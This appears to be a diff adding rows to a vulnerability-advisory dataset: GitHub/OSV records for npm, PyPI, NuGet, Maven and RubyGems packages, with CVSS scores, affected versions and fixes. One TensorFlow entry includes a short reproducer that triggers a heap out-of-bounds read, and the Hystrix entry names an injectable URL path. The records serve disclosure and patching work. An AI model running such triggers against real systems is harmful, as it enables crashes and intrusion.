+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'graphql-playground-react'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.28'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/security/advisories/GHSA-x4r7-m2q9-69c8'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphql-playground/security/advisories/GHSA-59r9-6jp6-jcm7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41249'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphql-playground/commit/b8a956006835992f12c46b90384a79ab82bcadad'}, {'type': 'WEB', 'url': 'https://github.com/graphql/graphiql/blob/main/docs/security/2021-introspection-schema-xss.md#2-more-details-on-the-vulnerability'}, {'type': 'PACKAGE', 'url': 'https://github.com/graphql/graphql-playground'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T19:36:13Z', 'nvd_published_at': '2021-11-04T20:15:00Z'}"
+1.4.0,GHSA-896r-f27r-55mw,2022-08-10T23:36:10Z,2021-11-19T20:16:17Z,,['CVE-2021-3918'],json-schema is vulnerable to Prototype Pollution,json-schema before version 0.4.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'json-schema'}, 'ecosystem_specific': {'affected_functions': ['json-schema.validate']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3918'}, {'type': 'WEB', 'url': 'https://github.com/kriszyp/json-schema/commit/22f146111f541d9737e832823699ad3528ca7741'}, {'type': 'WEB', 'url': 'https://github.com/kriszyp/json-schema/commit/b62f1da1ff5442f23443d6be6a92d00e65cba93a'}, {'type': 'WEB', 'url': 'https://github.com/kriszyp/json-schema/commit/f6f6a3b02d667aa4ba2d5d50cc19208c4462abfa'}, {'type': 'PACKAGE', 'url': 'https://github.com/kriszyp/json-schema'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/bb6ccd63-f505-4e3a-b55f-cd2662c261a9'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/12/msg00013.html'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T22:44:27Z', 'nvd_published_at': '2021-11-13T09:15:00Z'}"
+1.4.0,GHSA-v5vg-g7rq-363w,2022-07-15T20:23:13Z,2021-11-08T17:40:49Z,,['CVE-2021-23820'],Prototype Pollution in json-pointer,This affects versions of package `json-pointer` up to and including `0.6.1`. A type confusion vulnerability can lead to a bypass of CVE-2020-7709 when the pointer components are arrays.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'json-pointer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.6.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23820'}, {'type': 'WEB', 'url': 'https://github.com/manuelstofer/json-pointer/pull/36'}, {'type': 'WEB', 'url': 'https://github.com/manuelstofer/json-pointer/commit/931b0f9c7178ca09778087b4b0ac7e4f505620c2'}, {'type': 'PACKAGE', 'url': 'https://github.com/manuelstofer/json-pointer'}, {'type': 'WEB', 'url': 'https://github.com/manuelstofer/json-pointer/blob/master/index.js%23L78'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSONPOINTER-1577287'}]","{'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:55:47Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}"
+1.4.0,GHSA-7rq6-7gv8-c37h,2021-11-03T14:35:35Z,2021-11-03T17:30:59Z,,['CVE-2021-41238'],Missing Authorization with Default Settings in Dashboard UI,"Dashboard UI in Hangfire.Core uses authorization filters to protect it from showing sensitive data to unauthorized users. By default when no custom authorization filters specified, `LocalRequestsOnlyAuthorizationFilter` filter is being used to allow only local requests and prohibit all the remote requests to provide sensible, protected by default settings.
+
+However due to the recent changes, in version 1.7.25 no authorization filters are used by default, allowing remote requests to succeed.
+
+### Impact
+
+Missing authorization when default options are used for the Dashboard UI, e.g. when no custom authorization rules are used as recommended in the [Using Dashboard](https://docs.hangfire.io/en/latest/configuration/using-dashboard.html#configuring-authorization) documentation article.
+
+#### Impacted
+
+If you are using `UseHangfireDashboard` method with default `DashboardOptions.Authorization` property value, then your installation is impacted:
+
+```csharp
+app.UseHangfireDashboard(); // Impacted
+app.UseHangfireDashboard(""/hangfire"", new DashboardOptions()); // Impacted
+```
+
+#### Not Impacted
+
+If any other authorization filter is specified in the `DashboardOptions.Authorization` property, the you are not impacted:
+
+```csharp
+app.UseHangfireDashboard(""/hangfire"", new DashboardOptions
+{
+ Authorization = new []{ new SomeAuthorizationFilter(); } // Not impacted
+});
+```
+
+### Patches
+
+Patch is already available in version [1.7.26](https://github.com/HangfireIO/Hangfire/releases/tag/v1.7.26) and already available on NuGet.org, please see [Hangfire.Core 1.7.26](https://www.nuget.org/packages/Hangfire.Core/1.7.26). Default authorization rules now prohibit remote requests by default again by including the `LocalRequestsOnlyAuthorizationFilter` filter to the default settings. Please upgrade to the newest version in order to mitigate the issue.
+
+### Workarounds
+
+It is possible to fix the issue by using the `LocalRequestsOnlyAuthorizationFilter` explicitly when configuring the Dashboard UI. In this case upgrade is not required.
+
+```csharp
+// using Hangfire.Dashboard;
+
+app.UseHangfireDashboard(""/hangfire"", new DashboardOptions
+{
+ Authorization = new []{ new LocalRequestsOnlyAuthorizationFilter(); }
+});
+```
+
+### References
+
+Original GitHub Issue: https://github.com/HangfireIO/Hangfire/issues/1958","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Hangfire.Core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.25'}, {'fixed': '1.7.26'}]}], 'versions': ['1.7.25']}]","[{'type': 'WEB', 'url': 'https://github.com/HangfireIO/Hangfire/security/advisories/GHSA-7rq6-7gv8-c37h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41238'}, {'type': 'WEB', 'url': 'https://github.com/HangfireIO/Hangfire/issues/1958'}, {'type': 'PACKAGE', 'url': 'https://github.com/HangfireIO/Hangfire'}, {'type': 'WEB', 'url': 'https://www.nuget.org/packages/Hangfire.Core'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-02T19:50:00Z', 'nvd_published_at': '2021-11-02T18:15:00Z'}"
+1.4.0,GHSA-7fw7-gh23-f832,2022-05-04T03:47:21Z,2021-11-01T19:19:29Z,,['CVE-2020-36381'],Vulnerability in singleCrunch function leads to arbitrary code execution via filePath parameters,"aaptjs is a node wraper for aapt. An issue was discovered in the singleCrunch function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36381'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T18:59:05Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}"
+1.4.0,GHSA-f54p-f6jp-4rhr,2021-11-08T21:57:41Z,2021-11-10T18:46:52Z,,['CVE-2021-41223'],Heap OOB in `FusedBatchNorm` kernels,"### Impact
+The [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/fused_batch_norm_op.cc#L1292) of `FusedBatchNorm` kernels is vulnerable to a heap OOB:
+
+```python
+import tensorflow as tf
+
+tf.raw_ops.FusedBatchNormGrad(
+ y_backprop=tf.constant([i for i in range(9)],shape=(1,1,3,3),dtype=tf.float32)
+ x=tf.constant([i for i in range(2)],shape=(1,1,1,2),dtype=tf.float32)
+ scale=[1,1],
+ reserve_space_1=[1,1],
+ reserve_space_2=[1,1,1],
+ epsilon=1.0,
+ data_format='NCHW',
+ is_training=True)
+```
+
+### Patches
+We have patched the issue in GitHub commit [aab9998916c2ffbd8f0592059fad352622f89cda](https://github.com/tensorflow/tensorflow/commit/aab9998916c2ffbd8f0592059fad352622f89cda).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-f54p-f6jp-4rhr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41223'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/aab9998916c2ffbd8f0592059fad352622f89cda'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:57:41Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-qg54-694p-wgpp,2023-05-16T16:07:35Z,2021-11-16T00:32:30Z,,['CVE-2021-41817'],Regular expression denial of service vulnerability (ReDoS) in date,"Date’s parsing methods including Date.parse are using Regexps internally, some of which are vulnerable against regular expression denial of service. Applications and libraries that apply such methods to untrusted input may be affected.
+
+The fix limits the input length up to 128 bytes by default instead of changing the regexps. This is because Date gem uses many Regexps and it is possible that there are still undiscovered vulnerable Regexps. For compatibility, it is allowed to remove the limitation by explicitly passing limit keywords as nil like Date.parse(str, limit: nil), but note that it may take a long time to parse.
+
+Please update the date gem to version 3.2.1, 3.1.2, 3.0.2, and 2.0.1, or later. You can use gem update date to update it. If you are using bundler, please add gem ""date"", "">= 3.2.1"" to your Gemfile. If you import `date` from the standard library rather than as a gem you should update your Ruby install to `3.0.3`, `2.7.5`, `2.6.9` or later.
+
+Users unable to upgrade may consider using `Date.strptime` instead with a predefined date format
+```ruby
+Date.strptime('2001-02-20', '%Y-%m-%d')
+```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'date'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.1'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'date'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.1.2'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'date'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'date'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41817'}, {'type': 'WEB', 'url': 'https://github.com/ruby/date/commit/3959accef8da5c128f8a8e2fd54e932a4fb253b0'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1254844'}, {'type': 'PACKAGE', 'url': 'https://github.com/ruby/date'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/date/CVE-2021-41817.yml'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IUXQCH6FRKANCVZO2Q7D2SQX33FP3KWN/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UTOJGS5IEFDK3UOO7IY4OTTFGHGLSWZF/'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2021/11/15/date-parsing-method-regexp-dos-cve-2021-41817/'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-16T00:15:43Z', 'nvd_published_at': '2022-01-01T05:15:00Z'}"
+1.4.0,GHSA-8phj-f9w2-cjcc,2022-05-26T19:49:03Z,2021-11-23T22:03:23Z,,['CVE-2021-43775'],Arbitrary file reading vulnerability in Aim,"### Impact
+A path traversal attack aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.
+
+Vulnerable code: https://github.com/aimhubio/aim/blob/0b99c6ca08e0ba7e7011453a2f68033e9b1d1bce/aim/web/api/views.py#L9-L16
+
+### Patches
+The vulnerability issue is resolved in Aim v3.1.0.
+
+### References
+https://owasp.org/www-community/attacks/Path_Traversal
+
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'aim'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aimhubio/aim/security/advisories/GHSA-8phj-f9w2-cjcc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43775'}, {'type': 'WEB', 'url': 'https://github.com/aimhubio/aim/issues/999'}, {'type': 'WEB', 'url': 'https://github.com/aimhubio/aim/pull/1003'}, {'type': 'WEB', 'url': 'https://github.com/aimhubio/aim/pull/1003/commits/f01266a1a479ef11d7d6c539e7dd89e9d5639738'}, {'type': 'PACKAGE', 'url': 'https://github.com/aimhubio/aim'}, {'type': 'WEB', 'url': 'https://github.com/aimhubio/aim/blob/0b99c6ca08e0ba7e7011453a2f68033e9b1d1bce/aim/web/api/views.py#L9-L16'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-23T18:48:09Z', 'nvd_published_at': '2021-11-23T21:15:00Z'}"
+1.4.0,GHSA-2xwq-h7r9-6w27,2021-11-22T18:46:48Z,2021-11-23T17:59:40Z,,['CVE-2021-3957'],Cross-site Scripting in kimai2,Cross site request forgery vulnerability is present in delete functionality of doctor feature. This vulnerability is capable of deleting system logs,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'kevinpapst/kimai2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3957'}, {'type': 'WEB', 'url': 'https://github.com/kevinpapst/kimai2/commit/6b49535b523dcd36ec59462ee4e67e2b3a9151f3'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/5fa3098a-ba02-45e0-af56-645e34dbc691'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:46:48Z', 'nvd_published_at': '2021-11-19T12:15:00Z'}"
+1.4.0,GHSA-6hpv-v2rx-c5g6,2021-11-08T22:36:05Z,2021-11-10T19:02:17Z,,['CVE-2021-41209'],FPE in convolutions with zero size filters,"### Impact
+The [implementations for convolution operators](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/kernels/conv_ops.cc) trigger a division by 0 if passed empty filter tensor arguments.
+
+### Patches
+We have patched the issue in GitHub commit [f2c3931113eaafe9ef558faaddd48e00a6606235](https://github.com/tensorflow/tensorflow/commit/f2c3931113eaafe9ef558faaddd48e00a6606235).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6hpv-v2rx-c5g6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41209'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f2c3931113eaafe9ef558faaddd48e00a6606235'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:36:05Z', 'nvd_published_at': '2021-11-05T22:15:00Z'}"
+1.4.0,GHSA-gx3f-hq7p-8fxv,2021-11-22T19:53:38Z,2021-11-23T17:53:33Z,,['CVE-2021-22053'],Code injection in spring-cloud-netflix-hystrix-dashboard,"Applications using the `spring-cloud-netflix-hystrix-dashboard` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.cloud:spring-cloud-netflix-hystrix-dashboard'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.10.RELEASE'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.2.9.RELEASE'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22053'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2021-22053'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:53:38Z', 'nvd_published_at': '2021-11-19T16:15:00Z'}"
+1.4.0,GHSA-282f-qqgm-c34q,2021-11-08T17:44:31Z,2021-11-08T17:44:45Z,,['CVE-2021-23807'],Prototype Pollution in node-jsonpointer,This affects the package `jsonpointer` before `5.0.0`. A type confusion vulnerability can lead to a bypass of a previous Prototype Pollution fix when the pointer components are arrays.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsonpointer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23807'}, {'type': 'WEB', 'url': 'https://github.com/janl/node-jsonpointer/pull/51'}, {'type': 'WEB', 'url': 'https://github.com/janl/node-jsonpointer/commit/a0345f3550cd9c4d89f33b126390202b89510ad4'}, {'type': 'PACKAGE', 'url': 'https://github.com/janl/node-jsonpointer'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSONPOINTER-1577288'}]","{'cwe_ids': ['CWE-1321', 'CWE-843'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:58:08Z', 'nvd_published_at': '2021-11-03T18:15:00Z'}"
+1.4.0,GHSA-wx69-rvg3-x7fc,2021-12-01T15:07:01Z,2021-11-30T22:21:01Z,,['CVE-2021-43787'],XSS via prototype pollution in NodeBB ,"### Impact
+A prototype pollution vulnerability in the uploader module allowed a malicious user to inject arbitrary data (i.e. javascript) into the DOM, theoretically allowing for an account takeover when used in conjunction with a path traversal vulnerability disclosed at the same time as this report.
+
+### Patches
+The vulnerability has been patched as of v1.18.5.
+
+### Workarounds
+Cherry-pick commit hash 1783f918bc19568f421473824461ff2ed7755e4c to receive this patch in lieu of a full upgrade.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at [security@nodebb.org](mailto:security@nodebb.org)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nodebb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.18.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/security/advisories/GHSA-wx69-rvg3-x7fc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43787'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/commit/1783f918bc19568f421473824461ff2ed7755e4c'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/nodebb-remote-code-execution-with-one-shot/'}, {'type': 'PACKAGE', 'url': 'https://github.com/NodeBB/NodeBB'}, {'type': 'WEB', 'url': 'https://github.com/NodeBB/NodeBB/releases/tag/v1.18.5'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T14:35:09Z', 'nvd_published_at': '2021-11-29T20:15:00Z'}"
+1.4.0,GHSA-g2q5-5433-rhrf,2022-09-07T22:17:03Z,2021-11-04T16:24:44Z,,[],Embedded malware in rc,"The npm package `rc` had versions published with malicious code. Users of affected versions (1.2.9, 1.3.9, and 2.3.9) should downgrade to 1.2.8 as soon as possible and check their systems for suspicious activity.
+Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.",[],"[{'package': {'ecosystem': 'npm', 'name': 'rc'}, 'versions': ['1.2.9']}, {'package': {'ecosystem': 'npm', 'name': 'rc'}, 'versions': ['1.3.9']}, {'package': {'ecosystem': 'npm', 'name': 'rc'}, 'versions': ['2.3.9']}]","[{'type': 'PACKAGE', 'url': 'https://github.com/dominictarr/rc'}, {'type': 'WEB', 'url': 'https://therecord.media/malware-found-in-coa-and-rc-two-npm-packages-with-23m-weekly-downloads/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/rc'}, {'type': 'WEB', 'url': 'https://www.virustotal.com/gui/file/26451f7f6fe297adf6738295b1dcc70f7678434ef21d8b6aad5ec00beb8a72cf?nocache=1'}]","{'cwe_ids': ['CWE-506'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-04T16:20:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-7pxj-m4jf-r6h2,2021-11-08T22:46:25Z,2021-11-10T19:12:46Z,,['CVE-2021-41203'],Missing validation during checkpoint loading,"### Impact
+An attacker can trigger undefined behavior, integer overflows, segfaults and `CHECK`-fail crashes if they can change saved checkpoints from outside of TensorFlow.
+
+This is because the checkpoints loading infrastructure is missing validation for invalid file formats.
+
+### Patches
+We have patched the issue in GitHub commits [b619c6f865715ca3b15ef1842b5b95edbaa710ad](https://github.com/tensorflow/tensorflow/commit/b619c6f865715ca3b15ef1842b5b95edbaa710ad), [e8dc63704c88007ee4713076605c90188d66f3d2](https://github.com/tensorflow/tensorflow/commit/e8dc63704c88007ee4713076605c90188d66f3d2), [368af875869a204b4ac552b9ddda59f6a46a56ec](https://github.com/tensorflow/tensorflow/commit/368af875869a204b4ac552b9ddda59f6a46a56ec), and [abcced051cb1bd8fb05046ac3b6023a7ebcc4578](https://github.com/tensorflow/tensorflow/commit/abcced051cb1bd8fb05046ac3b6023a7ebcc4578).
+
+These fixes will be included in TensorFlow 2.7.0. We will also cherrypick these commits on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
